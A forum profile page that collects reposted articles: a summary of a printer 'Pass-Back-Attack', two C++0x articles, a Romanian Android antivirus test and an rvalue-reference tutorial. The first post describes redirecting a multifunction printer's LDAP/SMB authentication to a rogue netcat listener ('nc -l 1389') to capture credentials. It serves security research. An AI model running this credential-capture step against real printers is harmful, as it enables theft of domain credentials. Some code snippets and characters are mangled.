Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. Anatomy of a Pass-Back-Attack: Intercepting Authentication Credentials Stored in Multifunction Printers By Deral (PercX) Heiland and Michael (omi) Belton At Defcon 19 during my presentation we discussed a new attack method against printers. This attack method involved tricking the printer into passing LDAP or SMB credential back to attacker in plain text. We refer to this attack as a Pass-Back-Attack . So its been awhile, but we wanted to release a short tutorial discussing how this attack is performed. Over the past year, one focus of the Foofus.NET team involves developing and testing attacks against a number of Multifunction Printer (MFP) devices. A primary goal of this research is to demonstrate the effect of trust relationships between devices that are generally considered benign, and critical systems such as Microsoft Windows Domains. One of the most interesting attacks developed during this project is what we refer to as a Pass-Back Attack. A Pass-Back Attack is an attack where we direct an MFP device into authenticating (LDAP or SMB authentication) against a rogue system rather than the expected server. In the following sections we will step through the entire process of a Pass-Back-Attack using a Ricoh Aficio MP 5001 as our target device. This attack has been found to work on a number of Ricoh or rebranded Ricoh systems. Additionally, this attack works against a large number of MFP devices manufactured by Sharp. We expect there are many other devices that this attack will work against. This attack will be performed using a web browser, Netcat and a web proxy. First, we need to create a rogue listener that will be used to capture the authentication process initiated from the MFP. This is a relatively easy problem to solve; we can simply setup a listener using Netcat. $ nc -l 1389 In this attack we will use port 1389. If you’re reading this, you’re probably well aware that binding to a privileged port requires some form of administrative account such as “root.” We prefer non-privileged ports for this attack because they allow us to demonstrate how unprivileged access on one system can be used to gain privileged access to another system. A demonstration of this involves a scenario where you have remote (user-level) access to a device on a filtered subnet and are looking to gain more privileged access to a wider set of systems. Additionally, this approach highlights the fact that LDAP can be configured to authenticate against any software listening on any port. Download: http://www.foofus.net/~percX/praeda/pass-back-attack.pdf Sursa: http://www.foofus.net/?p=468
  2. Static code analysis and the new language standard C++0x April 14, 2010 9:00 PM PDT Abstract Introduction 1. auto 2. decltype 3. R-value reference 4. Right angle brackets 5. Lambdas 6. Suffix return type syntax 7. static_assert 8. nullptr 9. New standard classes 10. New trends in development of static code analyzers Summary References Abstract The article discusses the new capabilities of C++ language described in the standard C++0x and supported in Visual Studio 2010. By the example of PVS-Studio we will see how the changes in the language influence static code analysis tools. Introduction The new C++ language standard is about to come into our life. They are still calling it C++0x, although its final name seems to be C++11. The new standard is partially supported by modern C++ compilers, for example, Intel C++ and Visual C++. This support is far from being full-fledged and it is quite clear why. First, the standard has not been accepted yet, and second, it will take some time to introduce its specifics into compilers even when it is accepted. Compiler developers are not the only ones for whom support of the new standard is important. The language innovations must be quickly provided with support in static source code analyzers. It is promised that the new standard will provide backward compatibility. The obsolete C++ code is almost guaranteed to be able to be correctly compiled by new compilers without any modifications. But it does not mean that a program that does not contain new language constructs still can be processed by a static analyzer that does not support the new standard C++0x. We got convinced of it in practice when trying to check a project created in the beta-version of Visual Studio 2010 with PVS-Studio. The point is about the header files that already use the new language constructs. For example, you may see that the header file "stddef.h" uses the new operator decltype: namespace std { typedef decltype(__nullptr) nullptr_t; } Such constructs are naturally considered syntactically wrong by an analyzer that does not support C++0x, and either cause a program abort or incorrect results. It got obvious that we must provide support for C++0x in PVS-Studio by the moment Visual Studio is released, at least to the extent it is done in this compiler. We may say that we have fulfilled this task with success, and by the moment of writing this article, the new version PVS-Studio 3.50, integrating both into Visual Studio 2005/2008 and Visual Studio 2010, has become available on our site. Beginning with the version PVS-Studio 3.50, the tool provides support for the same part of C++0x standard as in Visual Studio 2010. This support is not perfect as, for example, in case of "right-angle brackets", but we will continue the work on developing the support for C++0x standard in the next versions. In this article, we will study the new features of the language which are supported in the first edition of Visual Studio 2010. We will look at these features from different viewpoints: what this or that new ability is about, if there is a relation to 64-bit errors, how the new language construct is supported in PVS-Studio and how its appearance impacts the library VivaCore. Note. VivaCore is a library of code parsing, analysis and transformation. VivaCore is an open-source library that supports the languages C and C++. The product PVS-Studio is based on VivaCore as well as other program projects may be created relying on this library. The article we want to present may be called a report on the investigation and support of the new standard in PVS-Studio. The tool PVS-Studio diagnoses 64-bit and parallel OpenMP errors. But since the topic of moving to 64-bit systems is more relevant at the moment, we will mostly consider examples that show how to detect 64-bit errors with PVS-Studio. 1. auto Like in C, the type of a variable in C++ must be defined explicitly. But with the appearance of template types and techniques of template metaprogramming in C++ language, it became usual that the type of an object is not so easy to define. Even in a rather simple case - when searching for array items - we need to define the type of an iterator in the following way: for (vector<int>::iterator itr = myvec.begin(); itr != myvec.end(); ++itr) Such constructs are very long and cumbersome. To make the record briefer, we may use typedef but it will spawn new entities and do little for the purpose of convenience. C++0x offers its own technique to make this issue a bit less complicated. The meaning of the key word auto is replaced with a different one in the new standard. While auto has meant before that a variable is created in the stack, and it was implied if you had not specified otherwise (for example, register), now it is analogous to var in C# 3.0. The type of a variable defined as auto is determined by the compiler itself relying on what object initializes this variable. We should notice that an auto-variable cannot store values of different types during one instance of program execution. C++ still remains a statically typed language, and by using auto we just tell the compiler to see to defining the type on its own: once the variable is initialized, its type cannot be changed. Now the iterator can be defined in this way: for (auto itr = myvec.begin(); itr != myvec.end(); ++itr) Besides mere convenience of writing the code and its simplification, the key word auto makes the code safer. Let us consider an example where auto will be used to make the code safe from the viewpoint of 64-bit software development: bool Find_Incorrect(const string *arrStr, size_t n) { for (size_t i = 0; i != n; ++i) { unsigned n = arrStr[i].find("ABC"); if (n != string::npos) return true; } return false; }; This code has a 64-bit error: the function behaves correctly when compiling the Win32 version and fails when the code is built in the Win64 mode. The error is in using the type unsigned for the variable "n", although the type string::size_type must be used which is returned by the function find(). In the 32-bit program, the types string::size_type and unsigned coincide and we get correct results. In the 64-bit program, string::size_type and unsigned do not coincide any more. When the substring is not found, the function find() returns the value string::npos that equals 0xFFFFFFFFFFFFFFFFui64. This value is cut to the value 0xFFFFFFFFu and placed into a 32-bit variable. As a result, the condition 0xFFFFFFFFu != 0xFFFFFFFFFFFFFFFFui64 is true and we have the situation when the function Find_Incorrect always returns true. In this example, the error is not so dangerous because it is detected even by the compiler not to speak of a specialized analyzer Viva64 (included into PVS-Studio). This is how the compiler detects the error: warning C4267: 'initializing' : conversion from 'size_t' to 'unsigned int', possible loss of data This is how Viva64 does it: V103: Implicit type conversion from memsize to 32-bit type. What is most important, this error is quite possible and often occurs in code due to inaccurate choice of a type to store the returned value. The error might appear even because the programmer is reluctant to use a cumbersome construct of the string::size_type kind. Now we can easily avoid such errors without overloading the code. Using the type auto, we may write the following simple and safe code: auto n = arrStr[i].find("ABC"); if (n != string::npos) return true; The error disappeared by itself. The code has not become more complicated or less effective. Here is the conclusion - it is reasonable in many cases to use auto. The key word auto will reduce the number of 64-bit errors or let you eliminate them with more grace. But auto does not in itself guarantee that all the 64-bit errors will be eliminated! It is just one more language tool that serves to make programmers' life easier but not to take all their work of managing the types. Consider this example: void *AllocArray3D(int x, int y, int z, size_t objectSize) { int size = x * y * z * objectSize; return malloc(size); } The function must calculate the array's size and allocate the necessary memory amount. It is logical to expect that this function will be able to allocate the necessary memory amount for the array of the size 2000*2000*2000 of double type in the 64-bit environment. But the call of the "AllocArray3D(2000, 2000, 2000, sizeof(double));" kind will always return NULL, as if it is impossible to allocate such an amount of memory. The true reason for this is the overflow in the expression "int size = x * y * z * sizeof(double)". The variable size takes the value -424509440 and the further call of the function malloc is senseless. By the way, the compiler will also warn that this expression is unsafe: warning C4267: 'initializing' : conversion from 'size_t' to 'int', possible loss of data Relying on auto, an inaccurate programmer may modify the code in the following way: void *AllocArray3D(int x, int y, int z, size_t objectSize) { auto size = x * y * z * objectSize; return (double *)malloc(size); } But it will not eliminate the error at all and will only hide it. The compiler will not generate a warning any more but the function AllocArray3D will still return NULL. The type of the variable size will automatically turn into size_t. But the overflow occurs when calculating the expression "x * y * z". This subexpression has the type int at first and only then it will be extended to size_t when being multiplied by the variable "objectSize". Now this hidden error may be found only with the help of Viva64 analyzer: V104: Implicit type conversion to memsize type in an arithmetic expression. The conclusion - you must be attentive even if you use auto. Let us now briefly look how the new key word is supported in the library VivaCore the static analyzer Viva64 is based on. So, the analyzer must be able to understand that the variable AA has the type int to warn (see V101) the programmer about an extension of the variable AA to the type size_t: void Foo(int X, int Y) { auto AA = X * Y; size_t BB = AA; //V101 } First of all, a new table of lexemes was composed that included the new C++0x key words. This table is stored in the file Lex.cc and has the name tableC0xx. To avoid modifying the obsolete code responsible for processing the lexeme "auto" (tkAUTO), it got the name tkAUTOcpp0x in this table. With the appearance of the new lexeme, the following functions were modified: isTypeToken, optIntegralTypeOrClassSpec. A new class LeafAUTOc0xx appeared. TypeInfoId has a new object class - AutoDecltypeType. To code the type auto, the letter 'x' was chosen and it was reflected in the functions of the classes TypeInfo and Encoding. These are, for example, such functions as IsAutoCpp0x, MakePtree. These corrections let you parse the code with the key word auto that has a new meaning and save the type of objects in the coded form (letter 'x'). But this does not let you know what type is actually assigned to the variable. That is, VivaCore lacks the functionality that would let you make sure that the variable AA in the expression "auto AA = X * Y" will have the type int. This functionality is implemented in the source code of Viva64 and cannot be integrated into the code of VivaCore library. The implementation principle lies in additional work of calculating the type in TranslateAssignInitializer method. After the right side of the expression is calculated, the association between the (Bind) name of the variable and the type is replaced with another. FULL article: http://software.intel.com/en-us/articles/static-code-analysis-and-the-new-language-standard-c0x/
  3. No 'Concepts' in C++0x Overload Journal #92 - August 2009 Author: Bjarne Stroustrup There have been some major decisions made about the next C++ Standard. Bjarne Stroustrup explains what's changed and why. At the July 2009 Frankfurt meeting of the ISO C++ Standards Committee (WG21) [iSO], the 'concepts' mechanism for specifying requirements for template arguments was 'decoupled' (my less-diplomatic phrase was 'yanked out'). That is, 'concepts' will not be in C++0x or its standard library. That - in my opinion - is a major setback for C++, but not a disaster; and some alternatives were even worse. I have worked on 'concepts' for more than seven years and looked at the problems they aim to solve much longer than that. Many have worked on 'concepts' for almost as long. For example, see (listed in chronological order): Bjarne Stroustrup and Gabriel Dos Reis: 'Concepts - Design choices for template argument checking'. October 2003. An early discussion of design criteria for 'concepts' for C++. [stroustrup03a] Bjarne Stroustrup: 'Concept checking - A more abstract complement to type checking'. October 2003. A discussion of models of 'concept' checking. [stroustrup03b] Bjarne Stroustrup and Gabriel Dos Reis: 'A concept design' (Rev. 1). April 2005. An attempt to synthesize a 'concept' design based on (among other sources) N1510, N1522, and N1536. [stroustrup05] Jeremy Siek et al.: Concepts for C++0x. N1758==05-0018. May 2005. [siek05] Gabriel Dos Reis and Bjarne Stroustrup: 'Specifying C++ Concepts'. POPL06. January 2006. [Reis06] Douglas Gregor and Bjarne Stroustrup: Concepts. N2042==06-0012. June 2006. The basis for all further 'concepts' work for C++0x. [Gregor06a] Douglas Gregor et al.: Concepts: Linguistic Support for Generic Programming in C++. OOPSLA'06, October 2006. An academic paper on the C++0x design and its experimental compiler ConceptGCC. [Gregor06b] Pre-Frankfurt working paper (with 'concepts' in the language and standard library): 'Working Draft, Standard for Programming Language C++'. N2914=09-0104. June 2009. [Frankfurt09] B. Stroustrup: Simplifying the use of concepts. N2906=09-0096. June 2009. [stroustrup09] It need not be emphasized that I and others are quite disappointed. The fact that some alternatives are worse is cold comfort and I can offer no quick and easy remedies. Please note that the C++0x improvements to the C++ features that most programmers see and directly use are unaffected. C++0x will still be a more expressive language than C++98, with support for concurrent programming, a better standard library, and many improvements that make it significantly easier to write good (i.e., efficient and maintainable) code. In particular, every example I have ever given of C++0x code (e.g., in 'Evolving a language in and for the real world: C++ 1991-2006' [stroustrup07] at ACM HOPL-III [HOPL]) that does not use the keywords 'concept' or 'requires' is unaffected. See also my C++0x FAQ [FAQ]. Some people even rejoice that C++0x will now be a simpler language than they had expected. 'Concepts' were to have been the central new feature in C++0x for putting the use of templates on a better theoretical basis, for firming-up the specification of the standard library, and a central part of the drive to make generic programming more accessible for mainstream use. For now, people will have to use 'concepts' without direct language support as a design technique. My best scenario for the future is that we get something better than the current 'concept' design into C++ in about five years. Getting that will take some serious focused work by several people (but not 'design by committee'). What happened? 'Concepts', as developed over the last many years and accepted into the C++0x working paper in 2008, involved some technical compromises (which is natural and necessary). The experimental implementation was sufficient to test the 'conceptualized' standard library, but was not production quality. The latter worried some people, but I personally considered it sufficient as a proof of concept. My concern was with the design of 'concepts' and in particular with the usability of 'concepts' in the hands of 'average programmers'. That concern was shared by several members. The stated aim of 'concepts' was to make generic programming more accessible to most programmers [stroustrup03a], but that aim seemed to me to have been seriously compromised: Rather than making generic programming more accessible, 'concepts' were becoming yet another tool in the hands of experts (only). Over the last half year or so, I had been examining C++0x from a user's point of view, and I worried that even use of libraries implemented using 'concepts' would put new burdens on programmers. I felt that the design of 'concepts' and its use in the standard library did not adequately reflect our experience with 'concepts' over the last few years. Then, a few months ago, Alisdair Meredith (an insightful committee member from the UK) and Howard Hinnant (the head of the standard library working group) asked some good questions relating to who should directly use which parts of the 'concepts' facilities and how. That led to a discussion of usability involving many people with a variety of concerns and points of view; and I eventually - after much confused discussion - published my conclusions [stroustrup09]. To summarize and somewhat oversimplify, I stated that: 'Concepts' as currently defined are too hard to use and will lead to disuse of 'concepts', possibly disuse of templates, and possibly to lack of adoption of C++0x. A small set of simplifications [stroustrup09] can render 'concepts' good-enough-to-ship on the current schedule for C++0x or with only a minor slip. That's pretty strong stuff. Please remember that standards committee discussions are typically quite polite, and since we are aiming for consensus, we tend to avoid direct confrontation. Unfortunately, the resulting further (internal) discussion was massive (hundreds of more and less detailed messages) and confused. No agreement emerged on what problems (if any) needed to be addressed or how. This led me to order the alternatives for a presentation in Frankfurt: 'fix and ship' Remaining work: remove explicit 'concepts', add explicit refinement, add 'concept'/type matching, handle 'concept' map scope problems Risks: no implementation, complexity of description Schedule: no change or one meeting 'Yank and ship' Remaining work: yank (core and standard library) Risks: old template problems remain, disappointment in 'progressive' community ('seven year's work down the drain') Schedule: five years to 'concepts' (complete redesign needed) or never 'Status quo' Remaining work: details Risks: unacceptable programming model, complexity of description (alternative view: none) Schedule: no change I and others preferred the first alternative ('fix and ship') and considered it feasible. However, a large majority of the committee disagreed and chose the second alternative ('yank and ship', renaming it 'decoupling'). In my opinion, both are better than the third alternative ('status quo'). My interpretation of that vote is that given the disagreement among proponents of 'concepts', the whole idea seemed controversial to some, some were already worried about the ambitious schedule for C++0x (and, unfairly IMO, blamed 'concepts'), and some were never enthusiastic about 'concepts'. Given that, 'fixing concepts' ceased to be a realistic option. Essentially, all expressed support for 'concepts', just 'later' and 'eventually'. I warned that a long delay was inevitable if we removed 'concepts' now because in the absence of schedule pressures, essentially all design decisions will be re-evaluated. Surprisingly (maybe), there were no technical presentations and discussions about 'concepts' in Frankfurt. The discussion focused on timing and my impression is that the vote was decided primarily on timing concerns. Please don't condemn the committee for being cautious. This was not a 'Bjarne vs. the committee fight', but a discussion trying to balance a multitude of serious concerns. I and others are disappointed that we didn't take the opportunity of 'fix and ship', but C++ is not an experimental academic language. Unless members are convinced that the risks for doing harm to production code are very low, they must oppose. Collectively, the committee is responsible for billions of lines of code. For example, lack of adoption of C++0x or long-term continued use of unconstrained templates in the presence of 'concepts' would lead to a split of the C++ community into separate sub-communities. Thus, a poor 'concept' design could be worse than no 'concepts'. Given the choice between the two, I too voted for removal. I prefer a setback to a likely disaster. Technical issues The unresolved issue about 'concepts' focused on the distinction between explicit and implicit 'concept' maps (see [stroustrup09]): Should a type that meets the requirements of a 'concept' automatically be accepted where the 'concept' is required (e.g. should a type X that provides +, -, *, and / with suitable parameters automatically match a 'concept' C that requires the usual arithmetic operations with suitable parameters) or should an additional explicit statement (a 'concept' map from X to C) that a match is intentional be required? (My answer: Use automatic match in almost all cases). Should there be a choice between automatic and explicit 'concepts' and should a designer of a 'concept' be able to force every user to follow his choice? (My answer: All 'concepts' should be automatic). Should a type X that provides a member operation X::begin() be considered a match for a 'concept' C<T> that requires a function begin(T) or should a user supply a 'concept' map from T to C? An example is std::vector and std::Range. (My answer: It should match). The answers 'status quo before Frankfurt' all differ from my suggestions. Obviously, I have had to simplify my explanation here and omit most details and most rationale. I cannot reenact the whole technical discussion here, but this is my conclusion: In the 'status quo' design, 'concept' maps are used for two things: To map types to 'concepts' by adding/mapping attributes To assert that a type matches a 'concept'. Somehow, the latter came to be seen an essential function by some people, rather than an unfortunate rare necessity. When two 'concepts' differ semantically, what is needed is not an assertion that a type meets one and not the other 'concept' (this is, at best, a workaround - an indirect and elaborate attack on the fundamental problem), but an assertion that a type has the semantics of the one and not the other 'concept' (fulfills the axiom(s) of the one and not the other 'concept'). For example, the STL input iterator and forward iterator have a key semantic difference: you can traverse a sequence defined by forward iterators twice, but not a sequence defined by input iterators; e.g., applying a multi-pass algorithm on an input stream is not a good idea. The solution in 'status quo' is to force every user to say what types match a forward iterator and what types match an input iterator. My suggested solution adds up to: If (and only if) you want to use semantics that are not common to two 'concepts' and the compiler cannot deduce which 'concept' is a better match for your type, you have to say which semantics your type supplies; e.g., 'my type supports multi-pass semantics'. One might say, 'When all you have is a 'concept' map, everything looks like needing a type/'concept' assertion.' At the Frankfurt meeting, I summarized: Why do we want 'concepts'? To make requirement on types used as template arguments explicit Precise documentation Better error messages Overloading Different people have different views and priorities. However, at this high level, there can be confusion - but little or no controversy. Every half-way reasonable 'concept' design offers that. What concerns do people have? Programmability Complexity of formal specification Compile time Run time My personal concerns focus on 'programmability' (ease of use, generality, teachability, scalability) and the complexity of the formal specification (40 pages of standards text) is secondary. Others worry about compile time and run time. However, I think the experimental implementation (ConceptGCC [Gregor06b]) shows that run time for constrained templates (using 'concepts') can be made as good as or better than current unconstrained templates. ConceptGCC is indeed very slow, but I don't consider that fundamental. When it comes to validating an idea, we hit the traditional dilemma. With only minor oversimplification, the horns of the dilemma are: 'Don't standardize without commercial implementation' 'Major implementers do not implement without a standard' Somehow, a detailed design and an experimental implementation have to become the basis for a compromise. My principles for 'concepts' are: Duck typing The key to the success of templates for GP (compared to OO with interfaces and more). Substitutability Never call a function with a stronger precondition than is 'guaranteed'. 'Accidental match' is a minor problem Not in the top 100 problems. My 'minimal fixes' to 'concepts' as present in the pre-Frankfurt working paper were: 'Concepts' are implicit/auto To make duck typing the rule. Explicit refinement To handle substitutability problems. General scoping of 'concept' maps To minimize 'implementation leakage'. Simple type/'concept' matching To make vector a range without redundant 'concept' map For details, see [stroustrup09]. No C++0x, long live C++1x Even after cutting 'concepts', the next C++ standard may be delayed. Sadly, there will be no C++0x (unless you count the minor corrections in C++03). We must wait for C++1x, and hope that 'x' will be a low digit. There is hope because C++1x is now feature complete (excepting the possibility of some national standards bodies effectively insisting on some feature present in the formal proposal for the standard). 'All' that is left is the massive work of resolving outstanding technical issues and comments. A list of features and some discussion can be found on my C++0x FAQ [FAQ]. Here is a subset: atomic operations auto (type deduction from initializer) C99 features enum class (scoped and strongly typed enums) constant expressions (generalized and guaranteed; constexpr) defaulted and deleted functions (control of defaults) delegating constructors in-class member initializers inherited constructors initializer lists (uniform and general initialization) lambdas memory model move semantics; see rvalue references null pointer (nullptr) range for statement raw string literals template alias thread-local storage (thread_local) unicode characters uniform initialization syntax and semantics user-defined literals variadic templates and libraries: improvements to algorithms containers duration and time_point function and bind forward_list a singly-liked list future and promise garbage collection ABI hash_tables; see unordered_map metaprogramming and type traits random number generators regex a regular expression library scoped allocators smart pointers; see shared_ptr, weak_ptr, and unique_ptr threads atomic operations tuple Even without 'concepts', C++1x will be a massive improvement on C++98, especially when you consider that these features (and more) are designed to interoperate for maximum expressiveness and flexibility. I hope we will see 'concepts' in a revision of C++ in maybe five years. Maybe we could call that C++1y or even 'C++y!' References [FAQ] Bjarne Stroustrup, 'C++0x - the next ISO C++ standard' (FAQ), available from: C++11 FAQ [Frankfurt09] 'Working Draft, Standard for Programming Language C++', a pre-Frankfurt working paper, June 2009, available from: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2009/n2914.pdf [Gregor06a] Douglas Gregor and Bjarne Stroustrup, June 2006, 'Concepts', availabe from: http://www.open-std.org/JTC1/SC22/WG21/docs/papers/2006/n2042.pdf [Gregor06b] Douglas Gregor, Jaakko Jarvi, Jeremy Siek, Bjarne Stroustrup, Gabriel Dos Reis and Andrew Lumsdaine, October 2006, 'Concepts: Linguistic support for generic programming in C++', available from: http://www.research.att.com/~bs/oopsla06.pdf [HOPL] Proceedings of the History of Programming Languages conference 2007, available from: http://portal.acm.org/toc.cfm?id=1238844 [iSO] The C++ Standards Committee - ISO/IEC JTC1/SC22/WG21 - The C++ Standards Committee [Reis06] Gabriel Dos Reis and Bjarne Stroustrup, January 2006, 'Specifying C++ concepts', available from: http://www.research.att.com/~bs/popl06.pdf [siek05] Jeremy Siek, Douglas Gregor, Ronald Garcia, Jeremiah Willcock, Jaakko Jarvi and Andrew Lumsdaine, May 2005, 'Concepts for C++0x', available from: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2005/n1758.pdf [stroustrup03a] Bjarne Stroustrup and Gabriel Dos Reis, October 2003, 'Concepts - Design choices for template argument checking', available from: http://www.research.att.com/~bs/N1522-concept-criteria.pdf [stroustrup03b] Bjarne Stroustrup, October 2003, 'Concept checking - A more abstract complement to type checking', available from: http://www.research.att.com/~bs/n1510-concept-checking.pdf [stroustrup05] Bjarne Stroustrup and Gabriel Dos Reis, April 2005, 'A concept design (Rev. 1)' available from:http://www.research.att.com/~bs/n1782-concepts-1.pdf [stroustrup07] Bjarne Stroustrup, May 2007, 'Evolving a language in and for the real world: C++ 1991-2006', available from: http://www.research.att.com/~bs/hopl-almost-final.pdf [stroustrup09] Bjarne Stroutstrup 'Simplifying the use of concepts'. Available from: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2009/n2906.pdf -------------------------------------------------------------------- Sursa: ACCU :: No 'Concepts' in C++0x
  4. 14 suite de securitate pentru Android testate pe 181 de viru?i de Faravirusi.com Andrei Av?d?nei - 01 Noiembrie, 2011 la 3:00 O afisare FaraVirusi.com a lansat ieri unul dintre cele mai mari teste de detec?ie pentru platforma Android, realizat de un site independent. In acest moment exist? circa 600 de viru?i pentru platforma Android. Num?rul utilizatorilor de smartphone cu acest sistem de operare este in continu? cre?tere, iar interesul este identic ?i din partea creatorilor de malware. Pentru acest audit s-a folosit un set de 181 de aplica?ii infectate (.apk) din perioada iulie-octombrie a.c. ?i au fost testate principalele 14 produse de securitate pentru Android. Iat? rezultatele detec?iei: Kaspersky* – 175 detectati (96.68%) Dr.Web – 171 detectati (94.47%) IKARUS – 170 detectati (93.92%) F-Secure* – 164 detectati (90.60%) Zoner – 163 detectati (90.05%) VIPRE** – 159 detectati (87.84%) ESET** – 151 detectati (83.42%) BitDefender* – 124 detectati (68.50%) BullGuard* – 119 detectati (65.74%) NetQin – 116 detectati (64.08%) Webroot – 115 detectati (63.53%) Trend Micro – 100 detectati (55.24%) McAfee* – 53 detectati (29.28%) BlackBelt* – 41 detectati (22.65%) In ceea ce prive?te o solu?ie de securitate pentru telefon, detec?ia nu este singurul aspect de luat in seam?. Impactul asupra duratei de via?? a bateriei este de asemenea foarte important, iar aici NetQin, BitDefender ?i Zoner Antivirus exceleaz?. Produsele enumerate nu vor consuma mai mult de 1-2% din baterie. Pe de alt? parte Dr.Web, VIPRE ?i Lookout, al?turi de Webroot pot avea un impact mai mare asupra bateriei. In al doilea rand, func?iile oferite intr-o versiune gratuita sunt importante, iar cea de recuperare a unui telefon pierdut este la fel de important? c? detectia antivirus. Aici NetQin ?i BitDefender abund? in optiuni si facilitati oferite fara niciun cost utilizatorilor, pornind de la antivirus, anti-lost, protectie web si chiar protectie impotriva interceptarilor telefonice, backup si optimizarea sistemului. In plus, pretul unei solutii de securitate pentru Android nu este motivat pana in acest moment, avand in vedere ca cele gratuite se descurca foarte bine ?i ofera multe functii aditionale detectiei antivirus. Totusi, dac? doriti o asemenea investitie recomandarea este Kaspersky, fara indoiala. Pentru cei care nu considera utila investitia, recomandarile noastre in materie de protectie gratuita pentru telefonul tau Android sunt: Dr.Web ?i NetQin. Una din recomandari merge spre Dr.Web, gratie detectiei foarte bune. In schimb nu ofera nimic in plus in versiunea gratuita, de aceea e discutabil daca sa-l instalati sau nu. A doua recomandare este NetQin pentru o detectie rezonabila si functii numeroase oferite. De asemenea, produsul ofera motor dual: clasic ?i cloud. IKARUS este un produs nou, care nu ofera decat protectie antivirus si are anumite probleme de stabilitate. Zoner este putin cunoscut pe piata si este creat de un fost hacker. Note: Produsele marcate cu * sunt contra cost, iar cele cu ** sunt inca in testare Beta. 1. Norton Mobile Security LITE nu este disponibil in Romania. 2. BitDefender, ESET ?i VIPRE sunt in stadiul de testare Beta, iar BitDefender va deveni produs cu plata din noiembrie. 3. Lookout si G Data nu ofera scanare la cerere pentru continutul cardului sau memoria telefonului. Sursa: http://www.worldit.info/noutati/14-suite-de-securitate-pentru-android-testate-pe-181-de-virusi-de-faravirusi-com/
  5. C++ A Brief Introduction to Rvalue References by Howard E. Hinnant, Bjarne Stroustrup, and Bronek Kozicki March 10, 2008 Summary Rvalue references is a small technical extension to the C++ language. Rvalue references allow programmers to avoid logically unnecessary copying and to provide perfect forwarding functions. They are primarily meant to aid in the design of higher performance and more robust libraries. Introduction This document gives a quick tour of the new C++ language feature rvalue reference. It is a brief tutorial, rather than a complete reference. For details, see these references. The rvalue reference An rvalue reference is a compound type very similar to C++'s traditional reference. To better distinguish these two types, we refer to a traditional C++ reference as an lvalue reference. When the term reference is used, it refers to both kinds of reference: lvalue reference and rvalue reference. An lvalue reference is formed by placing an & after some type. A a; A& a_ref1 = a; // an lvalue reference An rvalue reference is formed by placing an && after some type. A a; A&& a_ref2 = a; // an rvalue reference An rvalue reference behaves just like an lvalue reference except that it can bind to a temporary (an rvalue), whereas you can not bind a (non const) lvalue reference to an rvalue. A& a_ref3 = A(); // Error! A&& a_ref4 = A(); // Ok Question: Why on Earth would we want to do this?! It turns out that the combination of rvalue references and lvalue references is just what is needed to easily code move semantics. The rvalue reference can also be used to achieve perfect forwarding, a heretofore unsolved problem in C++. From a casual programmer's perspective, what we get from rvalue references is more general and better performing libraries. Move Semantics Eliminating spurious copies Copying can be expensive. For example, for std::vectors, v2=v1 typically involves a function call, a memory allocation, and a loop. This is of course acceptable where we actually need two copies of a vector, but in many cases, we don't: We often copy a vector from one place to another, just to proceed to overwrite the old copy. Consider: template <class T> swap(T& a, T& { T tmp(a); // now we have two copies of a a = b; // now we have two copies of b b = tmp; // now we have two copies of tmp (aka a) } But, we didn't want to have any copies of a or b, we just wanted to swap them. Let's try again: template <class T> swap(T& a, T& { T tmp(std::move(a)); a = std::move(; b = std::move(tmp); } This move() gives its target the value of its argument, but is not obliged to preserve the value of its source. So, for a vector, move() could reasonably be expected to leave its argument as a zero-capacity vector to avoid having to copy all the elements. In other words, move is a potentially destructive read. In this particular case, we could have optimized swap by a specialization. However, we can't specialize every function that copies a large object just before it deletes or overwrites it. That would be unmanageable. The first task of rvalue references is to allow us to implement move() without verbosity, or runtime overhead. move The move function really does very little work. All move does is accept either an lvalue or rvalue argument, and return it as an rvalue without triggering a copy construction: template <class T> typename remove_reference<T>::type&& move(T&& a) { return a; } It is now up to client code to overload key functions on whether their argument is an lvalue or rvalue (e.g. copy constructor and assignment operator). When the argument is an lvalue, the argument must be copied from. When it is an rvalue, it can safely be moved from. Overloading on lvalue / rvalue Consider a simple handle class that owns a resource and also provides copy semantics (copy constructor and assignment). For example a clone_ptr might own a pointer, and call clone() on it for copying purposes: template <class T> class clone_ptr { private: T* ptr; public: // construction explicit clone_ptr(T* p = 0) : ptr(p) {} // destruction ~clone_ptr() {delete ptr;} // copy semantics clone_ptr(const clone_ptr& p) : ptr(p.ptr ? p.ptr->clone() : 0) {} clone_ptr& operator=(const clone_ptr& p) { if (this != &p) { delete ptr; ptr = p.ptr ? p.ptr->clone() : 0; } return *this; } // move semantics clone_ptr(clone_ptr&& p) : ptr(p.ptr) {p.ptr = 0;} clone_ptr& operator=(clone_ptr&& p) { std::swap(ptr, p.ptr); return *this; } // Other operations T& operator*() const {return *ptr;} // ... }; Except for the highlighted move semantics section above, clone_ptr is code that you might find in today's books on C++. Clients of clone_ptr might use it like so: clone_ptr p1(new derived); // ... clone_ptr p2 = p1; // p2 and p1 each own their own pointer Note that copy constructing or assigning a clone_ptr is a relatively expensive operation. However when the source of the copy is known to be an rvalue, one can avoid the potentially expensive clone() operation by pilfering the rvalue's pointer (no one will notice!). The move constructor above does exactly that, leaving the rvalue in a default constructed state. The move assignment operator simply swaps state with the rvalue. Now when code tries to copy an rvalue clone_ptr, or if that code explicitly gives permission to consider the source of the copy an rvalue (using std::move), the operation will execute much faster. clone_ptr p1(new derived); // ... clone_ptr p2 = std::move(p1); // p2 now owns the pointer instead of p1 For classes made up of other classes (via either containment or inheritance), the move constructor and move assignment can easily be coded using the std::move function: class Derived : public Base { std::vector<int> vec; std::string name; // ... public: // ... // move semantics Derived(Derived&& x) // rvalues bind here : Base(std::move(x)), vec(std::move(x.vec)), name(std::move(x.name)) { } Derived& operator=(Derived&& x) // rvalues bind here { Base::operator=(std::move(x)); vec = std::move(x.vec); name = std::move(x.name); return *this; } // ... }; Each subobject will now be treated as an rvalue when binding to the subobject's constructors and assignment operators. std::vector and std::string have move operations coded (just like our eariler clone_ptr example) which will completely avoid the tremendously more expensive copy operations. Note above that the argument x is treated as an lvalue internal to the move functions, even though it is declared as an rvalue reference parameter. That's why it is necessary to say move(x) instead of just x when passing down to the base class. This is a key safety feature of move semantics designed to prevent accidently moving twice from some named variable. All moves occur only from rvalues, or with an explicit cast to rvalue such as using std::move. If you have a name for the variable, it is an lvalue. Question: What about types that don't own resources? (E.g. std::complex?) No work needs to be done in that case. The copy constructor is already optimal when copying from rvalues. Movable but Non-Copyable Types Some types are not amenable to copy semantics but can still be made movable. For example: fstream unique_ptr (non-shared, non-copyable ownership) A type representing a thread of execution By making such types movable (though still non-copyable) their utility is tremendously increased. 